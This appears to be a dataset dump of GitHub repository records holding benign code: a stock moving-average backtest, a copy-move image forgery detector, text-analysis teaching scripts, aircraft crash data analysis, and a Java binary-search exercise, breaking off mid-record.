"text": "import yfinance as yf\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n# Parameters for stock bot\nSTART_DATE = '2003-01-02'\nUPDATE_XLSX = True\n\nOUTPUT_FILENAME = \"IWMDaily.xlsx\"\n# MOVING_AVERAGES = list(range(25, 30)) #DO 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100\n# VOLUME_MOVING_AVERAGES = list(range(1, 200))\n\ntickers_list = ['IWM']\n\n\ndef fetch_data():\n if UPDATE_XLSX:\n data = yf.download(tickers_list, START_DATE)\n data.to_excel(OUTPUT_FILENAME)\n\n return pd.read_excel(OUTPUT_FILENAME)\n\n\ndef algorithm():\n # Downloading data\n original_data = fetch_data()\n data = fetch_data()\n cp_values = []\n\n # Add SMA columns\n print(\"Generating SMA Columns...\")\n for MOVING_AVERAGE in MOVING_AVERAGES:\n data['SMA_' + str(MOVING_AVERAGE)] = original_data['Adj Close'].rolling(MOVING_AVERAGE).mean()\n\n # Add SMA columns\n print(\"Generating SMA VOLUME Columns...\")\n for VOLUME_MOVING_AVERAGE in VOLUME_MOVING_AVERAGES:\n data['VSMA_' + str(VOLUME_MOVING_AVERAGE)] = original_data['Volume'].rolling(VOLUME_MOVING_AVERAGE).mean()\n\n # Editing df\n data.set_index('Date', inplace=True)\n data['SPY∆'] = data.pct_change()['Adj Close'] + 1\n\n data['OWNED'] = True\n\n # Generate Data\n for MOVING_AVERAGE in MOVING_AVERAGES:\n print(\"Testing at SMA = \" + str(MOVING_AVERAGE))\n\n SMA_COL = 'SMA_' + str(MOVING_AVERAGE)\n\n for VOLUME_MOVING_AVERAGE in VOLUME_MOVING_AVERAGES:\n print(\"Testing at volume SMA = \" + str(VOLUME_MOVING_AVERAGE))\n\n VOL_SMA_COL = 'SMA_' + str(VOLUME_MOVING_AVERAGE)\n\n data['MAX'] = 0\n data['MIN'] = 10000000\n data['OWNED'] = True\n\n for i in range(1, len(data) - 1): # for each row in the dataframe\n # if not data.iloc[i]['OWNED']:\n if data.iloc[i]['Volume'] < data.iloc[i]['VSMA_' + str(VOLUME_MOVING_AVERAGE)]:\n data.iloc[i + 1, data.columns.get_loc('OWNED')] = True\n elif ((data.iloc[i]['Adj Close'] < data.iloc[i]['SMA_' + str(MOVING_AVERAGE)]) and (\n data.iloc[i]['Adj Close'] < data.iloc[i - 1]['Adj Close'])):\n data.iloc[i + 1, data.columns.get_loc('OWNED')] = True\n else:\n data.iloc[i + 1, data.columns.get_loc('OWNED')] = False\n\n data['Final'] = np.where(data['OWNED'], data['SPY∆'], 1)\n data['FinalCP_' + str(VOLUME_MOVING_AVERAGE) + '_' + str(MOVING_AVERAGE)] = data['Final'].cumprod(\n skipna=True)\n\n cp_values.append([MOVING_AVERAGE, VOLUME_MOVING_AVERAGE,\n data['FinalCP_' + str(VOLUME_MOVING_AVERAGE) + '_' + str(MOVING_AVERAGE)].iat[-1]])\n\n data.to_excel('all_values.xlsx')\n print(data)\n\n print(cp_values)\n # data.plot()\n # plt.show(block=True)\n\n\nfetch_data()\n# Execution of stock bot\n# algorithm()\n"
}
] | 1 |
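The `algorithm()` routine above builds its SMA_* and VSMA_* columns from trailing rolling means of price and volume. That transform, isolated into a self-contained sketch with toy data (the window sizes and column names here are illustrative, not the script's tuned values):

import pandas as pd

def add_smas(df, price_window=20, volume_window=20):
    out = df.copy()
    # Simple moving averages of price and volume over trailing windows.
    out["SMA_%d" % price_window] = out["Adj Close"].rolling(price_window).mean()
    out["VSMA_%d" % volume_window] = out["Volume"].rolling(volume_window).mean()
    return out

# Example with toy data; the first window-1 rows are NaN by construction.
df = pd.DataFrame({"Adj Close": range(1, 31), "Volume": [100] * 30})
print(add_smas(df, 5, 5).tail())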
niyishakapatrick/Copy-Move-forgery-detection-using-DoG-and-ORB | https://github.com/niyishakapatrick/Copy-Move-forgery-detection-using-DoG-and-ORB | a8bc43a3911cf6c8405c5d2f6acbb96289c886e7 | ecbca85ff622e19645a54efb97bd67eadb8d22b5 | 040011e9b1f99b349ebc92cee36dcafccedff73d | refs/heads/master | 2021-10-25T14:54:00.550510 | 2021-10-23T12:20:07 | 2021-10-23T12:20:07 | 136,803,473 | 16 | 7 | null | null | null | null | null | [
{
"alpha_fraction": 0.5660325884819031,
"alphanum_fraction": 0.61277174949646,
"avg_line_length": 27.944881439208984,
"blob_id": "4f5bcf26ee781f86ac77dc3647814d5a4c603ddc",
"content_id": "c7cd7331f1fed8afcf64047aaf99ff4eed80526a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3680,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 127,
"path": "/CMFD_DoG_ORB.py",
"repo_name": "niyishakapatrick/Copy-Move-forgery-detection-using-DoG-and-ORB",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\nfrom datetime import datetime\nfrom skimage.feature import blob_dog,match_descriptors\nfrom math import sqrt\nimport cv2\nimport numpy as np\nimport scipy\nfrom scipy import ndimage\nfrom scipy.spatial import distance\nimport glob, os\nimport math\n\n\n\n# Initiate orb detector\norb = cv2.ORB_create(1000)\n# create BFMatcher\nmatcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_BRUTEFORCE_HAMMING)\n\ndef sobel_f(im1):\n\timage =im1.astype (int)\n\t# derivatives\n\tdx=ndimage.sobel(image, 1)\n\tdy=ndimage.sobel(image, 0)\n\tmag=np.hypot(dx, dy)\n\t# normalization\n\tmag*= 255.0 / np.max(mag)\n\tsobel_im1 = np.uint8(mag)\n\treturn sobel_im1\n\n\ndef dog_f(im1_gray):\n\tblobs_dog = blob_dog(im1_gray, max_sigma=40, threshold=.1)\n\tblobs_dog[:, 2] = blobs_dog[:, 2] * sqrt(2)\n\treturn blobs_dog\n\n\ndef show_f(blobs_all):\n\tblob_area =[]\n\tblobs_list = [blobs_all]\n\tfor blobs in blobs_list:\n\t\tfor blob in blobs:\n\t\t\ty, x, r = blob\n\t\t\tarea = [y,x,r] \n\t\t\tif 2*r > 1:\n\t\t\t\t#print area\n\t\t\t\tblob_area.append(area) \n\treturn blob_area\n\nif __name__=='__main__':\n\ti = 0\n\timages = [image for image in sorted(glob.glob('*.jpg'))]\n\tfor im in images:\n\t\tprint(im)\n\t\tstart_time = datetime.now()\n\t\tim1 = cv2.imread (im)\n\t\tsobel_image = sobel_f(im1)\n\t\tsobel_gray =cv2.cvtColor(sobel_image, cv2.COLOR_BGR2GRAY)\n\t\tim2_gray =cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n\t\tblobs_all = dog_f(sobel_gray)\n\t\toutput = show_f(blobs_all)\n\t\tclone1 = im1.copy()\n\t\tkey,des = orb.detectAndCompute(im2_gray, None)\n\t\t#print('keypoints :',len(key),'...',len(des))\n\t\tsrc = np.array([]).reshape(-1,1,2)\n\t\tdst = np.array([]).reshape(-1,1,2)\n\t\tgeom = 0\n \n\t\tll =[]\n\t\tfor b0 in range(0,len(output)):\n\t\t\tb0y,b0x,b0r = output[b0]\n\t\t\tcv2.circle(clone1, (int(b0x),int(b0y)), int(b0r), (0, 0, 250), 1) \n\t\t\tl =[]\n\t\t\tkp_1 =[]\n\t\t\tds_1 =[]\n\t\t\tl3 =[]\n\t\t\tindex= 0\n\t\t\tfor k,d in zip(key,des):\n\t\t\t\tif (k.pt[0] - b0x)**2 + (k.pt[1] - b0y)**2 <= (b0r **2):\n\t\t\t\t\tl.append(index)\n\t\t\t\t\t#print('l :',len(l))\n\t\t\t\t\tkp_1.append(k)\n\t\t\t\t\tds_1.append(d)\n\t\t\t\tindex+=1\n\t\t\tif l:\n\t\t\t\tkp_2= np.delete(key,l,axis=0)\n\t\t\t\tds_2 = np.delete(des,l,axis=0)\n\t\t\t\t#print('k :',len(kp),'...',len(ds))\n\t\t\t\t#nn_matches = bf.match(np.array(ds_1),ds_2)\n\t\t\t\tnn_matches = matcher.knnMatch(np.array(ds_1), ds_2, 2)\n\t\t\t\t#print(nn_matches)\n\t\t\t\tgood = []\n\t\t\t\t#matched1 = []\n\t\t\t\t#matched2 = []\n\t\t\t\tnn_match_ratio = 0.6 # Nearest neighbor matching ratio\n\t\t\t\tfor m, n in nn_matches:\n\t\t\t\t\t#print(m)\n\t\t\t\t\t#Use 2-nn matches and ratio criterion to find correct keypoint matches\n\t\t\t\t\t#If the closest match distance is significantly lower than the second closest one, then the match is correct (match is not ambiguous).\n\t\t\t\t\tif m.distance < nn_match_ratio * n.distance:\n\t\t\t\t\t\t#print(x1,y1,x2,y2)\n\t\t\t\t\t\tgood.append(m)\n\n\n\t\t\t\tMIN_MATCH_COUNT = 3\n\t\t\t\tif len(good) > MIN_MATCH_COUNT:\n\t\t\t\t\tsrc_pts = np.float32([kp_1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n\t\t\t\t\tdst_pts = np.float32([kp_2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n\t\t\t\t\t#src = np.concatenate((src,src_pts))\n\t\t\t\t\t#dst = np.concatenate((dst,dst_pts))\n\t\t\t\t\tsrc = np.array(src_pts).ravel()\n\t\t\t\t\tdst = np.array(dst_pts).ravel()\n\t\t\t\t\tps =np.array(src).reshape((-1,2))\n\t\t\t\t\tpd =np.array(dst).reshape((-1,2))\n\t\t\t\t\tfor k1,k2 in 
zip(ps,pd):\n\t\t\t\t\t\tcv2.circle(clone1, (int(k1[0]),int(k1[1])),4,(0,0,255),-1)\n\t\t\t\t\t\tcv2.circle(clone1, (int(k2[0]),int(k2[1])),4,(0,255,255),-1)\n\t\t\t\t\t\tcv2.line(clone1,(int(k1[0]),int(k1[1])),(int(k2[0]),int(k2[1])),(0,255,0),2) \n\t\t#cv2.imshow('image',clone1)\n\t\tcv2.imwrite('detectionz-results__'+str(i)+'.png',clone1) \n\t\tend_time = datetime.now()\n\t\tprint('Duration: {}'.format(end_time - start_time))\n\t\ti += 1\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()\n\n\n\n\n"
},
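The matching core of the detector above is ORB descriptors compared with 2-nearest-neighbour Hamming matching plus Lowe's ratio criterion. Stripped of the blob bookkeeping, that core looks like the sketch below; it assumes OpenCV is installed and that the caller supplies two grayscale images (for copy-move detection the two "images" are descriptor sets from disjoint regions of the same picture).

import cv2

def ratio_test_matches(img1, img2, ratio=0.6):
    orb = cv2.ORB_create(1000)
    kp1, des1 = orb.detectAndCompute(img1, None)
    kp2, des2 = orb.detectAndCompute(img2, None)
    matcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_BRUTEFORCE_HAMMING)
    good = []
    for m, n in matcher.knnMatch(des1, des2, 2):
        # Keep a match only when it is clearly better than the runner-up.
        if m.distance < ratio * n.distance:
            good.append(m)
    return kp1, kp2, good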
{
"alpha_fraction": 0.8185776472091675,
"alphanum_fraction": 0.8185776472091675,
"avg_line_length": 343.5,
"blob_id": "e80f83d325d571ed3617046b4aa8587fdaf55175",
"content_id": "ce69f23ef64d9b36d72c8d853712fd214ff91514",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 650,
"num_lines": 2,
"path": "/README.md",
"repo_name": "niyishakapatrick/Copy-Move-forgery-detection-using-DoG-and-ORB",
"src_encoding": "UTF-8",
"text": "# DoG-ORB-copy-move-forgery-detection\nCopy–Move forgery or Cloning is a type of image tampering where a part of the image is copied and pasted on another part of same image. Due to availability of powerful Image editing software, the process of malicious manipulation,editing and creating fake images has been tremendously simple. Thus, there is a need of robust passive– blind image forensics(PBIF) techniques to validate the authenticity of digital Images. A Copy–move forgery detection technique using DoG (Difference of Gaussian) blob detector to detect regions in image, with rotation invariant and resistant to noise feature called ORB (Oriented Fast and Rotated Brief) is proposed.\n"
}
] | 2 |
cderose/text-analysis-2016 | https://github.com/cderose/text-analysis-2016 | d08e1746f7435db15bc7d0de979bb93bfd8ad561 | 9658cb7f244c51f4fabe6fedbb6f4a22f15954d1 | 8390804d9a5d724cc04d176d0e2953432f981162 | refs/heads/master | 2020-03-16T19:30:22.683815 | 2017-04-10T22:57:29 | 2017-04-10T22:57:29 | 132,919,008 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7519736886024475,
"avg_line_length": 30.020408630371094,
"blob_id": "68d7eb4c5d82bf6eb4b64908d3f5f473847fee25",
"content_id": "83d7e7d7aa599cbb2d6f835d10e05394fce49e95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1520,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 49,
"path": "/06-Literary Distinction (Probably)/literary_patterns-solution.py",
"repo_name": "cderose/text-analysis-2016",
"src_encoding": "UTF-8",
"text": "import os\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\n\n# Assign file paths to each set of poems\nreview_path = 'poems/reviewed/'\nrandom_path = 'poems/random/'\n\n# Get lists of text files in each directory\nreview_files = os.listdir(review_path)\nrandom_files = os.listdir(random_path)\n\n# Read in texts as strings from each location\nreview_texts = [open(review_path+file_name).read() for file_name in review_files]\nrandom_texts = [open(random_path+file_name).read() for file_name in random_files]\n\n# Collect all texts in single list\nall_texts = review_texts + random_texts\n\n# Get all file names together\nall_file_names = review_files + random_files\n\n# Keep track of classes with labels\nall_labels = ['reviewed'] * len(review_texts) + ['random'] * len(random_texts)\n\n# Intitialize the function that will transform our list of texts to a DTM\ncv = CountVectorizer(stop_words = 'english', min_df=180, binary = True, max_features = None)\n\n# Transform our texts to DTM\ndtm = cv.fit_transform(all_texts).toarray()\n\n# Train the classifier and assign it to a variable\nnb = MultinomialNB()\nnb.fit(dtm, all_labels)\n\n# Canonic file path\ncanonic_path = 'poems/canonic/'\n\n# Get list of file names in canonic directory\ncanonic_files = os.listdir(canonic_path)\n\n# Read in canonic texts\ncanonic_texts = [open(canonic_path+file_name).read() for file_name in canonic_files]\n\n# Transform into DTM\ncanonic_dtm = cv.transform(canonic_texts)\n\n# Make predictions\nnb.predict(canonic_dtm)\n"
},
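Before predicting on the canonic poems, it is worth estimating how separable "reviewed" and "random" actually are; cross-validation on the training DTM gives that estimate. A self-contained sketch of the idea with toy texts and labels (the real script would pass its own `dtm` and `all_labels`):

from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import cross_val_score

texts = ["the quiet river bends", "o wild west wind", "stock prices fell", "markets rallied today"]
labels = ["poem", "poem", "news", "news"]

dtm = CountVectorizer(binary=True).fit_transform(texts)
# Mean accuracy over 2 folds; a rough check that the features separate the classes.
print(cross_val_score(MultinomialNB(), dtm, labels, cv=2).mean())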
{
"alpha_fraction": 0.7463898658752441,
"alphanum_fraction": 0.7527076005935669,
"avg_line_length": 30.657142639160156,
"blob_id": "2a38927d3abef22d1d5e642a69cc26eedbd286bc",
"content_id": "6122afe1f6de674eaf45bbe9e5f4e9198cae14c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1108,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 35,
"path": "/03-Operationalizing/antigone solution.py",
"repo_name": "cderose/text-analysis-2016",
"src_encoding": "UTF-8",
"text": "import pandas\n\n# Tells Jupyter to produce images in notebook\n% pylab inline\n\n# Makes images look good\nstyle.use('ggplot')\n\n# Read spreadsheet from the hard drive\ndialogue_df = pandas.read_csv('antigone_dialogue.csv', index_col=0)\n\n# Create a list of lists; split each character's dialogue into a list of tokens\ndialogue_tokens = [character.split() for character in dialogue_df['DIALOGUE']]\n\n# How many tokens are in each list?\ndialogue_len = [len(tokens) for tokens in dialogue_tokens]\n\n# Assign this as a new column in the dataframe\ndialogue_df['WORDS_SPOKEN'] = dialogue_len\n\n# Get the total number of words\ntotal_words = sum(dialogue_df['WORDS_SPOKEN'])\n\n# Use that total to normalize the share of words belonging to each character\n# Multiply by 100 to convert to percentage\npercent_by_character = dialogue_df['WORDS_SPOKEN'] / total_words * 100\n\n# Add it as a new column to the dataframe\ndialogue_df['WORDS_PCT'] = percent_by_character\n\n# Re-sort in order of most prominent speaker\ndialogue_df = dialogue_df.sort_values('WORDS_PCT',ascending=False)\n\n# Visualize\ndialogue_df['WORDS_PCT'].plot(kind='bar')\n"
}
] | 2 |
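The normalisation in the Antigone solution (divide a column by its total, scale to percent, sort descending) is a reusable pattern. A small sketch of it as a helper, with hypothetical dialogue counts:

import pandas as pd

def percent_share(series):
    # Each value as a percentage of the column total, largest first.
    return (series / series.sum() * 100).sort_values(ascending=False)

counts = pd.Series({"KREON": 1100, "CHORUS": 900, "ANTIGONE": 700})
print(percent_share(counts))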
howardsuuu/Aircraft_crasher_data_analysis | https://github.com/howardsuuu/Aircraft_crasher_data_analysis | 87c62cdc0491101c7196376a5bfceed185ba4f18 | 04cf0da18dd269c80b28c79a8da0a0edcca02f05 | ad26ac703b73bca3e5632dee453bd2eac0c8c180 | refs/heads/master | 2020-05-01T14:42:42.895441 | 2019-08-28T17:53:51 | 2019-08-28T17:53:51 | 177,527,712 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6563209891319275,
"alphanum_fraction": 0.6669189929962158,
"avg_line_length": 29,
"blob_id": "19cbef70463e6720d9be2b3f5b94012c840c2bf3",
"content_id": "dfb5046f620e2aeef0b6fe7fedc4bafb46a49dd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1321,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 44,
"path": "/Aircraft_Crashing.py",
"repo_name": "howardsuuu/Aircraft_crasher_data_analysis",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\n# Read csv files\ndt = pd.read_csv(r\"/Users/howardsu666/Github/Data_analysis\"\n r\"/Aivation Accident\"\n r\"/Airplane_Crashes_and_Fatalities_Since_1908.csv\")\ndt['Date'] = dt['Date'].map(pd.to_datetime)\n#print(dt['Date'].head())\n\n# Create a new column, weekday based on the history date\ndef get_weekday(dataWeekday):\n return dataWeekday.weekday()\ndt['Weekday'] = dt['Date'].map(get_weekday)# can also using .apply()\n#print(dt['Weekday'])\n\n# To see the Freq of the crashing based on the weekdays\ndef count_row(rows):\n return len(rows)\nby_weekdays = dt.groupby('Weekday').apply(count_row)# Groupby - is a DataFrame\n#plt.bar(range(0,7), by_weekdays)\n#plt.xticks(range(0,7), ('Mon', 'Tue', 'Wen', 'Thu', 'Fri', 'Sat', 'Sun'))\n#plt.xlabel('Weekday')\n#plt.ylabel('Freq')\n#plt.title('Freq by Weekdays')\n#plt.show()\n\n# Create a new column, year based on the 'Date' column\n\ndt['Year'] = dt['Date'].dt.year\nplt.plot(dt['Year'], '.', ms = 0.5, alpha = .5)\nplt.xlabel('Freq')\nplt.ylabel('Year')\n#ax = plt.gca()\n#ax.invert_yaxis() Invert the y axis\nplt.title('Freq by Years')\nplt.show()\nplt.close()\n# Dot plot for\n\n# To see which Type of Aircraft \n#print(dt['Type'].describe())\n#print(dt['Type'].value_counts())\n\n"
},
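The Weekday column above is built by mapping a helper over datetime objects; pandas exposes the same information directly through the `.dt` accessor, and `value_counts` then gives the frequency table without a custom counting function. A sketch with toy dates:

import pandas as pd

dt = pd.DataFrame({"Date": pd.to_datetime(["1908-09-17", "1912-07-12", "2009-06-01"])})
dt["Weekday"] = dt["Date"].dt.weekday              # 0 = Monday ... 6 = Sunday
print(dt["Weekday"].value_counts().sort_index())   # crash count per weekday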
{
"alpha_fraction": 0.6017845869064331,
"alphanum_fraction": 0.6468147039413452,
"avg_line_length": 36.944881439208984,
"blob_id": "ef28471de3bbfbcca1f18b84efa0c9070d7a2483",
"content_id": "f0ab1185d1daa03a984f906f8b9c6ada19611aa3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4819,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 127,
"path": "/Air_acc.py",
"repo_name": "howardsuuu/Aircraft_crasher_data_analysis",
"src_encoding": "UTF-8",
"text": "import numpy as np \nimport pandas as pd \nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom datetime import date, timedelta, datetime\n\nData = pd.read_csv(r\"/Users/howardsu666/Github/Data_analysis\"\n r\"/Aivation Accident\"\n r\"/Airplane_Crashes_and_Fatalities_Since_1908.csv\")\n\n#print(Data.isnull().sum())\n\n# Cleaning\nData['Time'] = Data['Time'].replace(np.nan, '00:00') \nData['Time'] = Data['Time'].str.replace('c: ', '')\nData['Time'] = Data['Time'].str.replace('c:', '')\nData['Time'] = Data['Time'].str.replace('c', '')\nData['Time'] = Data['Time'].str.replace('12\\'20', '12:20')\nData['Time'] = Data['Time'].str.replace('18.4', '18:40')\nData['Time'] = Data['Time'].str.replace('0943', '09:43')\nData['Time'] = Data['Time'].str.replace('22\\'08', '22:08')\nData['Time'] = Data['Time'].str.replace('114:20:00', '00:00')\nData['Time'] = Data['Time'].str.replace('009:43', '0943')\nData['Time'] = Data['Time'].str.replace('18:400', '18:40')\nData['Time'] = Data['Time'].str.replace('18:401', '18:41')\nData['Time'] = Data['Time'].str.replace('18:402', '18:42')\nData['Time'] = Data['Time'].str.replace('18:403', '18:43')\nData['Time'] = Data['Time'].str.replace('18:404', '18:44')\nData['Time'] = Data['Time'].str.replace('18:405', '18:45')\nData['Time'] = Data['Time'].str.replace('18:406', '18:46')\nData['Time'] = Data['Time'].str.replace('18:407', '18:47')\nData['Time'] = Data['Time'].str.replace('18:408', '18:48')\nData['Time'] = Data['Time'].str.replace('18:409', '18:49')\nData['Time'] = Data['Time'].str.replace('114:20', '00:00')\n\n\n#print(type(set(Data['Time'])))\n#print(type(Data['Time']))\nData['Time'] = Data['Date'] + ' ' + Data['Time'] #joining two rows\n\n# integrate two col \ndef todate(a):\n return datetime.strptime(a, '%m/%d/%Y %H:%M')\n\nData['Time'] = Data['Time'].apply(todate)\n\n\n#print('Date ranges from ' + str(Data.Time.min()) + ' to ' + str(Data.Time.max()))\n#print(Data['Time'])\nData.Operator = Data.Operator.str.upper()\n\n\n\n# Visual the data: Total accidents \n# dt is to tell the series to use date data type\n# [['Date\"]] makes it change from series to dataframe\ntemporary_data = Data.groupby(Data.Time.dt.year)[['Date']].count()\nprint(temporary_data)# data frame\n\n# replace name Date into Count in the dataframe\ntemporary_data = temporary_data.rename(columns = {\"Date\": \"Count\"})\nplt.style.use('ggplot')\nplt.figure(figsize= (11,5))# define a window for barplot\n# Need to put index, showing the true year instead of from 0\nplt.plot(temporary_data.index, 'Count', data = temporary_data, color = 'red', \\\n marker = '.', linewidth = 1.)\nplt.xlabel('Year', fontsize = 12)\nplt.ylabel('Count', fontsize = 12)\nplt.title('Accidents frequency by Years', loc = 'Center', fontsize = 14)\nplt.show()\n\n\n\nimport matplotlib.pylab as pl\nimport matplotlib.gridspec as gridspec\n\ngG = gridspec.GridSpec(2,2)\n\npl.figure(figsize= (15,10))\nplt.style.use('seaborn-muted')\n\n# count by month\nax = pl.subplot(gG[0, :]) # both row/col are 0\nplt.bar(\n Data.groupby(Data.Time.dt.month)[['Date']]\n .count().index, 'Date', data=Data.groupby(Data.Time.dt.month)[['Date']]\n .count(), color='lightskyblue', linewidth=2\n)\nplt.xticks(Data.groupby(Data.Time.dt.month)[['Date']].count().index, ['Jan', \\\n 'Feb', 'Mar', 'Apr','May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'])\nplt.xlabel('Month', fontsize=10)\nplt.ylabel('Count', fontsize=10)\nplt.title('Count of accidents by Month', loc='Center', fontsize=14)\n\n# counts by week\nax = pl.subplot(gG[1, 
0])\nsns.barplot(Data.groupby(Data.Time.dt.weekday)[['Date']].count().index, 'Date', \\\n data=Data.groupby(Data.Time.dt.weekday) \\\n [['Date']].count(), color='lightskyblue', linewidth=2)\nplt.xticks(Data.groupby(Data.Time.dt.weekday)[['Date']].count().index, ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun'])\nplt.xlabel('Day of Week', fontsize=10)\nplt.ylabel('Count', fontsize=10)\nplt.title('Count of accidents by Day of Week', loc='Center', fontsize=14)\n\n# counts by hour\nax = pl.subplot(gG[1, 1])\nsns.barplot(Data[Data.Time.dt.hour != 0].groupby(Data.Time.dt.hour) \\\n [['Date']].count().index, 'Date', data=Data[Data.Time.dt.hour != 0] \\\n .groupby(Data.Time.dt.hour)[['Date']].count(),color ='lightskyblue', \\\n linewidth=2)\nplt.xlabel('Hour', fontsize=10)\nplt.ylabel('Count', fontsize=10)\nplt.title('Count of accidents by Hour', loc='Center', fontsize=14)\nplt.tight_layout()# prvent different subplot stack together\nplt.show()\n\n\n# Compare the civil and military with visual\n'''Data_2 = Data.copy()\nData_2['isMilitary'] = Data_2.Operator.str.contains('MILITARY')\nData_2['Military'] = Data_2.groupby('isMilitary')[['isMilitary']].count()\nData_2.index = ['Passenger', 'Military']\n\nData_3 = Data.copy()\nData_2['isMilitary'] = Data_2.Operator.str.contains('MILITARY')\n\nData_3 = Data['isMilitary'] == False'''\n"
},
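Air_acc.py scrubs a long list of malformed Time strings by hand before calling strptime. A more forgiving route is `pd.to_datetime` with `errors="coerce"`, which turns unparseable rows into NaT instead of raising, so the remaining dirty rows can be counted and inspected. A sketch:

import pandas as pd

raw = pd.Series(["09/17/1908 17:18", "07/12/1912 06:30", "bad time"])
parsed = pd.to_datetime(raw, format="%m/%d/%Y %H:%M", errors="coerce")
print(parsed)                                      # the malformed row becomes NaT
print(parsed.isna().sum(), "rows still need manual cleaning")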
{
"alpha_fraction": 0.7108614444732666,
"alphanum_fraction": 0.7880150079727173,
"avg_line_length": 132.39999389648438,
"blob_id": "79bbc4c20007d2417964f6b212eedb934d51484b",
"content_id": "6980e8e2645e14a6f6ee83d21982d5613024912f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1335,
"license_type": "no_license",
"max_line_length": 624,
"num_lines": 10,
"path": "/README.md",
"repo_name": "howardsuuu/Aircraft_crasher_data_analysis",
"src_encoding": "UTF-8",
"text": "# Aircraft_crasher_data_analysis\n## This dataset includes the airplane crahed that ranged from 1908 to 2009 Along with other categories: Time, Type, Fatalities, summary .etc I analyzed some cross relationship and present with the visuals.\n### I use Python well-known data analytics packages, numpy, panda, matplotlib, and seaborn to analyze this dataset.\nI manually found out some errors (Time format error) in the dataset and delete it, you can refer to my code for more detail\n\n#### Result: 1. The chart indicates the accident frequencies increased dramatically during 1940s which is WWII period. 2. Also, the chart shows during the 1960s, the frequency went high again, it might because of the introduction of the jet planes, which wasn't and mature technology then. 3. It seems that Jan, Aug, and Dec have the highest freqency among Month (Might because of the vacation season.) 4. For the accidents by day of week, each day seems average to me. 5. For the count of accidents by Hour, the image shows 9-10 am, 7 pm have the hightest frequencies due to they are the rush hour in the aviation industry.\n\n\n\n\n\n"
}
] | 3 |
roryxr/CodingPractice | https://github.com/roryxr/CodingPractice | e76a07e452fefda3ed00a5d8cd370ef9f9b9d1e0 | 40df64b261c196b7c99c91650e422240e580569d | 29ae0b78dd3e4fd0a83518b56fa442d07ca7748f | refs/heads/master | 2021-01-12T06:21:08.954792 | 2017-01-29T23:04:25 | 2017-01-29T23:04:25 | 77,345,752 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4771929681301117,
"alphanum_fraction": 0.5216374397277832,
"avg_line_length": 19.85365867614746,
"blob_id": "2f38d3385d641fa97049a36e57fb797709b32c77",
"content_id": "43790d3b49b13ac950cbacdf9eac0449da23e879",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 855,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 41,
"path": "/Leetcode/Q278/Solution.java",
"repo_name": "roryxr/CodingPractice",
"src_encoding": "UTF-8",
"text": "public class Solution {\n public static void main(String[] args) {\n Solution s = new Solution();\n s.firstBadVersion2(2126753390);\n System.out.println(\"Separator\");\n s.firstBadVersion(2126753390);\n }\n\n public int firstBadVersion(int n) {\n int lb = 1, ub = n;\n while (lb < ub) {\n int mid = (lb + ub) / 2;\n System.out.println(mid);\n if (!isBadVersion(mid)) {\n lb = mid + 1;\n } else {\n ub = mid;\n }\n }\n return lb;\n }\n\n public int firstBadVersion2(int n) {\n int lb = 1, ub = n;\n while (lb < ub) {\n int mid = lb + (ub - lb) / 2;\n System.out.println(mid);\n if (!isBadVersion(mid)) {\n lb = mid + 1;\n } else {\n ub = mid;\n }\n }\n return lb;\n }\n\n private boolean isBadVersion(int v) {\n if (v >= 1702766719) return true;\n return false;\n }\n}\n"
},
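The two Java methods above differ only in how the midpoint is computed: `(lb + ub) / 2` overflows a 32-bit int once `lb + ub` exceeds 2^31 - 1 (which happens with the test's n = 2126753390), while `lb + (ub - lb) / 2` never does. Python's integers are unbounded, but the wrap-around can be simulated by masking to 32 bits; a sketch using the values from this test case:

def to_int32(x):
    # Reinterpret x as a signed 32-bit integer, the way Java arithmetic would wrap.
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x >= 0x80000000 else x

lb, ub = 1702766719, 2126753390
print(to_int32(lb + ub) // 2)    # the sum wrapped negative, so this midpoint is garbage
print(lb + (ub - lb) // 2)       # overflow-safe midpoint: 1914760054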
{
"alpha_fraction": 0.6357388496398926,
"alphanum_fraction": 0.6408934593200684,
"avg_line_length": 20.55555534362793,
"blob_id": "5c4652f0351600beb1a42736ec97a07cc47ec72a",
"content_id": "9b97bf5abb94382e64b68cf8f09f5a3fe19678c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
